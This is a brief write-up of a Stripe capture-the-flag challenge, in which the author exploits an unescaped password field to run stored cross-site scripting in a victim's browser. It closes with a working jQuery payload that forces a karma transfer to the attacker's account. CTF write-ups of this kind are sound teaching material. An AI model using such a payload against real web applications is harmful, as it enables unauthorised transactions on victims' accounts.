Stripe CTF Writeup: Challenge 4

This challenge was focused on trying to force the user 'karma_fountain' to send us karma and thus reveal his password. After some deliberation, I decided that trying to hijack the cookie/session was not the point of the challenge. Next I tried to send money from karma_fountain to myself through by submitting something from myself, which ended up being a huge waste of time. Since I could not become him or send myself money from him by myself, I had to try to drive his browser and worked on trying to Cross Site Script him. The only thing that I had control of on his site was my password (which was shown to him when I sent him karma). This turns out to be the method through which we can send a XSS attack. My solution is shown below.

$.ajax({ type: 'POST', url: 'https://level04-4.stripe-ctf.com/user-xlbwayosyx/transfer', data: { 'from': 'karma_fountain', 'to': 'suntzu_II', 'amount': '100' }, success: function(msg){ alert("Winning!"); } });

-- suntzu_II